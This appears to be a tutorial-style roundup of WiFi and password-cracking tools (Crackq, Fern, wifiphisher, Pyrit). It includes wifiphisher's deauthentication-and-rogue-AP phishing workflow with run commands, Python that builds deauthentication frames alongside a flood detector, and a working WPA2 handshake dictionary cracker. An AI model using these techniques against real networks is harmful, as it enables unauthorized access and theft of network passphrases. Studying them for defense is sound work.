Crackq: crack PDF passwords

We explored a few options for cracking PDF passwords on Linux in an earlier article. Crackq is a new open source Python utility from Hashcrack that does the same. The difference is that the utility does not crack locally: it extracts the block of the PDF that holds the encryption information and sends only that block to the Hashcrack server, which runs a GPU-accelerated attack against a 6.3GB dictionary to recover the password.

Fern: crack WiFi in minutes!

Fern is a tool for discovering weaknesses in a wireless network. It uses aircrack-ng behind the scenes to do the actual work. The best feature of Fern is its excellent GUI, written in Python with Qt4. For those who don't want to learn the command-line options of complex tools like aircrack-ng, Fern is a godsend.

wifiphisher: automated WPA phishing (MitM) attacks

wifiphisher is a semi-automated Python utility that tries to obtain the WPA passphrase of a WiFi network through social engineering. The technique is different from the brute-force attack used in tools like Pyrit: no cracking is done, the victim is tricked into typing the passphrase. wifiphisher is installed by default on Kali Linux. In this article we explain how to install and run it on Ubuntu.

wifiphisher uses a three-stage procedure to retrieve the passphrase:

  1. Deauthenticate the victim. This is a plain denial of service on the wireless link, not a DDoS: the tool sends 802.11 deauthentication frames spoofed as coming from the access point to the client and as coming from the client to the access point. It also sends them to the broadcast address, which kicks every client off the network.
  2. Create a rogue access point that copies the target access point's settings (the same ESSID, on a second interface). The tool also runs its own DHCP server, does NAT and sets up port forwarding. Because the deauthentication never stops, the victim's device is pushed onto the rogue access point, which puts the attacker in the middle of its traffic.
  3. Once the victim joins the rogue access point, they are served a router configuration page that looks authentic. It claims a router firmware upgrade is required and asks for the WPA passphrase to proceed. If the victim enters it, the tool prints it in the console.
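Stage 1 above is the only step that needs an explanation at the frame level, so here is an added example (not code from the original post or from the wifiphisher project) that builds the three deauthentication frames of one burst as raw 802.11 bytes using only the standard library, parses them back, and runs a small detector over a constructed capture to show what the flood looks like from the defender's side. Nothing is transmitted; the MAC addresses and the reason code 7 are assumptions made for the example.

```python
"""
Added example, not from the original post or from wifiphisher: stage 1 of the
procedure (the deauthentication burst) as raw 802.11 frames, built with the
standard library only, plus a detector that flags the flood in a constructed
capture. MAC addresses and the reason code are assumptions for the example.
"""
import struct
from collections import Counter

# Frame Control byte 0: protocol version 0 (bits 0-1), type 0 = management
# (bits 2-3), subtype 12 = deauthentication (bits 4-7) -> 0xC0. Byte 1 = flags.
FC_DEAUTH = 0xC0
FC_BEACON = 0x80            # management subtype 8; only used for the benign frame
BROADCAST = "ff:ff:ff:ff:ff:ff"
REASON_CLASS3_NONASSOC = 7  # assumed reason code ("class 3 frame from nonassociated STA")

def mac_bytes(mac: str) -> bytes:
    return bytes(int(octet, 16) for octet in mac.split(":"))

def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)

def build_deauth(dst: str, src: str, bssid: str, reason: int = REASON_CLASS3_NONASSOC, seq: int = 0) -> bytes:
    """24-byte 802.11 MAC header (little-endian fields) followed by the 2-byte reason code."""
    header = struct.pack("<HH6s6s6sH", FC_DEAUTH, 0, mac_bytes(dst), mac_bytes(src), mac_bytes(bssid), seq << 4)
    return header + struct.pack("<H", reason)

def deauth_burst(ap: str, client: str, packets: int = 1) -> list:
    """One burst as the text describes: to the client, to the AP, and to broadcast (-p sets the count)."""
    frames = []
    for i in range(packets):
        frames.append(build_deauth(client, ap, ap, seq=3 * i))          # "from AP" to the client
        frames.append(build_deauth(ap, client, ap, seq=3 * i + 1))      # "from client" to the AP
        frames.append(build_deauth(BROADCAST, ap, ap, seq=3 * i + 2))   # "from AP" to everyone (-d skips this)
    return frames

def parse_deauth(frame: bytes):
    """Decode a deauthentication frame into its fields; return None for any other frame."""
    if len(frame) < 26:
        return None
    fc, _duration, a1, a2, a3, seqctl = struct.unpack("<HH6s6s6sH", frame[:24])
    if fc & 0xFF != FC_DEAUTH:
        return None
    (reason,) = struct.unpack("<H", frame[24:26])
    return {"dst": mac_str(a1), "src": mac_str(a2), "bssid": mac_str(a3), "seq": seqctl >> 4, "reason": reason}

def detect_deauth_flood(frames: list, threshold: int = 10) -> dict:
    """Count deauth frames per claimed transmitter; a real AP sends a few, a jammer sends hundreds."""
    per_source = Counter()
    for frame in frames:
        parsed = parse_deauth(frame)
        if parsed:
            per_source[parsed["src"]] += 1
    return {src: n for src, n in per_source.items() if n >= threshold}

AP = "00:11:22:33:aa:bb"      # assumed target access point
CLIENT = "66:77:88:99:cc:dd"  # assumed victim station

def constructed_capture() -> list:
    """Constructed sample capture: one beacon from the AP, then a 5-packet deauth burst."""
    beacon = struct.pack("<HH6s6s6sH", FC_BEACON, 0, mac_bytes(BROADCAST), mac_bytes(AP), mac_bytes(AP), 0) + b"\x00" * 12
    return [beacon] + deauth_burst(AP, CLIENT, packets=5)

if __name__ == "__main__":
    for frame in deauth_burst(AP, CLIENT):
        print(parse_deauth(frame))
    print(detect_deauth_flood(constructed_capture()))
```

Sending these frames for real needs an interface in monitor mode and a raw 802.11 socket (wifiphisher uses scapy for that, hence the python-scapy dependency). The detector is the point for a defender: frames whose source is your own BSSID but that you did not transmit, arriving at a rate no access point would produce, are the signature of this stage, and 802.11w (management frame protection) makes spoofed deauthentication frames fail the integrity check on clients and APs that negotiate it.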

Installation

Besides software dependencies, wifiphisher needs two wireless network interfaces, one of which must support packet injection (aireplay-ng -9 <interface> runs aircrack-ng's injection test against nearby access points and reports whether injection works).

To install wifiphisher on Ubuntu:

$ sudo apt-get install python-scapy tcpdump isc-dhcp-server hostapd
$ git clone https://github.com/sophron/wifiphisher.git

Usage

To run wifiphisher:

$ cd wifiphisher
$ sudo ./wifiphisher.py
OR
$ sudo python ./wifiphisher.py

The steps beyond this are self-explanatory. wifiphisher lists the access points it can see. Press <Ctrl-c> and enter the number of the victim's access point; wifiphisher starts the attack. From here everything is automatic, and if it manages to lure the victim into entering the passphrase, you get it in your console.

(Screenshot: the list of detected access points)

(Screenshot: a successful attack, with the captured passphrase in the console)

wifiphisher options (short form, long form, explanation):

-m, --maximum
    Choose the maximum number of clients to deauthenticate. The list of clients is emptied and repopulated after hitting the limit. Example: -m 5
-n, --noupdate
    Do not clear the deauthentication list when the maximum (-m) number of client/AP combinations is reached. Must be used together with -m. Example: -m 10 -n
-t, --timeinterval
    Choose the time interval between packets being sent. The default is as fast as possible. If you see scapy errors like 'no buffer space', try: -t .00001
-p, --packets
    Choose the number of packets to send in each deauthentication burst. The default is 1: one packet to the client and one packet to the AP. To send 2 packets to the client and 2 to the AP: -p 2
-d, --directedonly
    Skip the deauthentication packets to the broadcast address of the access point and only send them to client/AP pairs.
-a, --accesspoint
    Enter the MAC address of a specific access point to target.
-jI, --jamminginterface
    Choose the interface used for jamming. By default the script picks the most powerful interface and puts it into monitor mode.
-aI, --apinterface
    Choose the interface used for the rogue AP. By default the script picks the second most powerful interface and puts it into monitor mode.

Note that wifiphisher may not work under several circumstances. The victim may smell something fishy and back off, or may simply not know the passphrase, which is usually saved on the device once and never memorized. In addition, the victim's device is likely to raise warnings on the way to the cloned page: the rogue access point has no internet connectivity, so captive-portal checks fire, and because the phishing page is served over plain HTTP from an unauthenticated rogue network, any site the victim opens over HTTPS will show a certificate error rather than the cloned page.

On GitHub: https://github.com/sophron/wifiphisher

Pyrit: crack WPA/WPA2-PSK

Pyrit is a powerful brute-force utility for cracking WPA/WPA2-PSK authentication. Its trick is a time-memory trade-off: the expensive step of the attack depends only on the network name and the candidate password, so Pyrit precomputes it for large password lists and stores the results, in a file-based store or in an SQL database (MySQL among others), and reuses them to reach results much faster than a plain dictionary attack against each captured handshake. Quoting from the author: “WPA/WPA2-PSK assigns every participating party the same pre shared key. This master key is derived from a password which the administrating user has to pre-configure e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate following traffic. The “shortcut” of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home and small-office use at the cost of making the protocol vulnerable to brute-force-attacks against its key negotiation phase; it allows to ultimately reveal the password that protects the network.” Pyrit is the strongest attack against the widely used WPA/WPA2-PSK authentication protocols at the time of writing.
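The quoted paragraph describes the key hierarchy in words; the added example below (not code from the original post or from Pyrit) carries it through with the standard library. The master key is PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 rounds, 32 bytes); the session key is derived from the PMK, the two MAC addresses and the two nonces of the 4-way handshake, and its first 16 bytes (the KCK) authenticate the handshake messages. Because the PMK is the only slow step and depends on nothing captured from the air, a table of PMKs per ESSID can be built once and checked against any later handshake cheaply, which is what Pyrit's database does. The handshake here is constructed from a chosen passphrase; the only external value is the "password"/"IEEE" PMK, which is the published IEEE 802.11i test vector. MAC addresses, nonces and the wordlist are assumptions, and the MIC check assumes a WPA2 (key descriptor version 2, HMAC-SHA1) handshake.

```python
"""
Added example, not from the original post or from Pyrit: WPA/WPA2-PSK key
derivation and a handshake check against a precomputed PMK table. The
handshake is constructed here from a known passphrase; MACs, nonces and the
wordlist are assumptions. Key descriptor version 2 (HMAC-SHA1 MIC) is assumed.
"""
import hashlib
import hmac
import struct

def pmk_from_passphrase(passphrase: str, essid: str) -> bytes:
    """Master key (IEEE 802.11i): PBKDF2-HMAC-SHA1, 4096 iterations, 32 bytes. The slow step."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)

def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Session key: 802.11i PRF-512 'Pairwise key expansion'. Bytes 0-15 are the KCK."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    blob = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return blob[:64]

MIC_OFFSET = 81  # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields before the MIC

def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """WPA2 MIC: first 16 bytes of HMAC-SHA1(KCK, frame with the MIC field zeroed)."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def build_eapol_msg2(snonce: bytes, mic: bytes = b"\x00" * 16, replay_counter: int = 1) -> bytes:
    """Constructed EAPOL-Key message 2 of 4 (802.1X header + key descriptor, no key data)."""
    body = struct.pack(">BHHQ32s16s8s8s16sH",
                       2,        # descriptor type: RSN (WPA2)
                       0x010A,   # key info: pairwise, MIC set, descriptor version 2
                       0,        # key length (0 in message 2)
                       replay_counter, snonce,
                       b"\x00" * 16, b"\x00" * 8, b"\x00" * 8,  # key IV, RSC, key ID
                       mic, 0)   # MIC, key data length
    return struct.pack(">BBH", 2, 3, len(body)) + body  # version 2, type 3 = EAPOL-Key

def precompute_pmks(essid: str, wordlist: list) -> dict:
    """The Pyrit idea: run PBKDF2 once per (ESSID, candidate) and keep the result."""
    return {word: pmk_from_passphrase(word, essid) for word in wordlist}

def crack_handshake(pmk_table: dict, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes, eapol_frame: bytes):
    """Cheap per-candidate check: derive the KCK from a stored PMK and compare MICs."""
    captured_mic = eapol_frame[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate, pmk in pmk_table.items():
        kck = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol_frame), captured_mic):
            return candidate
    return None

# Constructed "capture": network name is the test-vector ESSID; addresses and nonces are made up.
ESSID = "IEEE"
AP_MAC = bytes.fromhex("00112233aabb")
STA_MAC = bytes.fromhex("66778899ccdd")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
WORDLIST = ["letmein", "12345678", "password", "hunter2"]

def constructed_handshake(passphrase: str = "password") -> bytes:
    """Message 2 of a 4-way handshake as a station using `passphrase` would send it."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ESSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return build_eapol_msg2(SNONCE, mic=eapol_mic(kck, build_eapol_msg2(SNONCE)))

if __name__ == "__main__":
    table = precompute_pmks(ESSID, WORDLIST)          # done once per ESSID, reusable
    print(crack_handshake(table, AP_MAC, STA_MAC, ANONCE, SNONCE, constructed_handshake()))
```

Note where the cost sits: every entry of the PMK table costs 4096 HMAC-SHA1 rounds, while checking one entry against a handshake costs four HMAC-SHA1 calls for the PRF and one for the MIC. That asymmetry is why the table pays off whenever more than one handshake for the same ESSID is attacked, and why the ESSID acts as a salt: a table for "IEEE" is useless against a network with any other name.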

To install on Ubuntu:

$ sudo apt-get install pyrit

Disclaimer: Pyrit should be used for educational and experimental purposes only and not to snoop on others or invade someone’s privacy.

Pyrit blog
Usage: Tutorial
Webpage: Pyrit